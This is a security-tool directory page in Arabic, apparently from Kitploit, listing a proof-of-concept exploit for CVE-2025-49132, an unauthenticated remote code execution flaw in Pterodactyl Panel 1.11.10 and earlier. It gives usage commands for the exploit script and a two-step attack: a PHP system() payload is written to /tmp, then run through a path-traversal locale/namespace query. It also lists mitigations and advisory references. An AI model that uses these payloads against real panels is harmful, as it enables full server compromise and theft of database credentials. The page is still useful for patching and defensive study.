Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-49132-Pterodactyl-Panel-Unauthenticated-Remote-Code-Execution-RCE- — PoC exploit لـ CVE-2025-49132 (GHSA-24wv-6c99-f843) – تنفيذ تعليمات برمجية عن بُعد بدون مصادقة في Pterodactyl Panel ≤ 1.11.10 | Kitploit
أدوات/GitHubGitHub/dollarboysushil/cve-2025-49132-pterodactyl-panel-unauthenticated-remote-code-execution-rce-
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubdollarboysushil/cve-2025-49132-pterodactyl-panel-unauthenticated-remote-code-execution-rce-

CVE-2025-49132-Pterodactyl-Panel-Unauthenticated-Remote-Code-Execution-RCE-

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PoC exploit لـ CVE-2025-49132 (GHSA-24wv-6c99-f843) – تنفيذ تعليمات برمجية عن بُعد بدون مصادقة في Pterodactyl Panel ≤ 1.11.10

عرض المستودعالموقع الإلكتروني
3منذ 6 أشهرلم تتم المراجعة بعد

CVE-2025-49132

Pterodactyl Panel - تنفيذ كود عن بعد غير مصادق عليه (RCE)


🔎 ملخص

CVE‑2025‑49132 هي ثغرة تنفيذ كود عن بعد حرجة تؤثر على Pterodactyl Panel <= 1.11.10.

يمكن لمهاجم غير مصادق استغلال التحقق غير السليم من المدخلات في نقطة النهاية /locales/locale.json لتنفيذ أوامر نظام عشوائية.

تم التصحيح في الإصدار: 1.11.11


📌 التأثير

يسمح الاستغلال الناجح بـ:

  • تنفيذ كود عن بعد غير مصادق عليه
  • قراءة ملفات حساسة (مثل .env)
  • استخراج بيانات اعتماد قاعدة البيانات
  • اختراق كامل للخادم

الخطورة: حرجة


🧠 السبب الجذري

توجد الثغرة بسبب التحقق غير السليم من:

  • locale parameter
  • namespace parameter

يمكن للمهاجم:

  1. إساءة استخدام اجتياز الدليل (../../../../../)
  2. استغلال config-create
  3. كتابة حمولات PHP عشوائية إلى /tmp
  4. تشغيل التنفيذ عبر تحميل نطاق مخصص (namespace) مصمم

تصنيف الضعف: CWE-94 -- التحكم غير السليم في توليد الكود


🚀 إثبات المفهوم (PoC)

الاستخدام

root@kitploit:~
python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]

أمثلة

root@kitploit:~
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR

المسار الافتراضي:

root@kitploit:~
/usr/share/php/PEAR

احصل على المسار الصحيح من صفحة /phpinfo.php alt text


🛠 تدفق الاستغلال

الخطوة 1 - كتابة الحمولة

يقوم المهاجم بحقن حمولة PHP خبيثة في /tmp/payload.php باستخدام:

root@kitploit:~
/<?=system('id')?>+/tmp/payload.php

الخطوة 2 --- تشغيل التنفيذ

من خلال استدعاء:

root@kitploit:~
?locale=../../../../../tmp&namespace=payload

يقوم الخادم بتنفيذ PHP المحقون.

alt text

🛡 التخفيف

  • الترقية إلى Pterodactyl Panel >= 1.11.11
  • تعقيم مدخلات locale و namespace
  • تعطيل دوال PHP الخطرة
  • تقييد تعرض نقاط النهاية غير الضرورية

📚 المراجع

  • GitHub Advisory: GHSA-24wv-6c99-f843
  • CVE-2025-49132
  • Pterodactyl Panel v1.11.11 Patch Commit

تنزيل الأداة